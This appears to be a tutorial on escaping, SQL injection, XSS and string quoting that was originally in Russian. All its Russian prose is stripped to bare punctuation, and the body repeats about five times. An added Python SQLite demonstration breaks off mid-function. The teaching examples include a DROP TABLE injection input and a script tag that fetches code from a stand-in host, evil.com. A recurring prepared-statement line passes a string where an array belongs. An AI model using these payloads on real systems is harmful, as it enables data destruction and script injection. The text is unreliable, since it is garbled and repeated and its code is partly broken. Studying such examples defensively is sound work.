$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'
Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
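As an added example (not code from the original article), the three inputs the article walks through are run against an in-memory SQLite table in Python: the concatenated query text the article shows, the parameterized lookup that keeps the quote as data, and HTML escaping of the script-tag post body. The users table, its phone numbers and the use of SQLite are assumptions made for the demonstration.

```python
import sqlite3
import html

# Constructed sample inputs: the three names the article walks through.
NAME_INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]

# Constructed sample post body: the article's script-tag example.
SCRIPT_BODY = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')


def build_query_naive(name: str) -> str:
    """Build the query by string concatenation, as in the article's
    $query = "SELECT ... WHERE name = '$name'" line. Whatever the user
    typed is pasted into the SQL text, so a quote in the name becomes
    SQL syntax rather than data."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed users table
    (assumed schema and phone numbers, not from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0100"), ("Mc'Donalds", "555-0199")])
    conn.commit()
    return conn


def lookup_naive(conn: sqlite3.Connection, name: str):
    """Execute the concatenated query. Returns the rows, or the database's
    error text when the pasted-in quote broke the statement (the
    Mc'Donalds case: the query is no longer valid SQL). Python's sqlite3
    execute() also refuses to run more than one statement at a time, so
    the DROP TABLE input ends up as an error here; other drivers and
    APIs do not stop at that point."""
    try:
        return conn.execute(build_query_naive(name)).fetchall()
    except sqlite3.Error as exc:
        return str(exc)


def lookup_prepared(conn: sqlite3.Connection, name: str):
    """The article's prepare/execute idea: the SQL text and the value travel
    separately, so the value can never change the shape of the statement.
    A quote or a semicolon in the name is just bytes to compare against."""
    return conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,)
    ).fetchall()


def table_exists(conn: sqlite3.Connection, table: str) -> bool:
    """Check the schema so a test can confirm nothing was dropped."""
    row = conn.execute(
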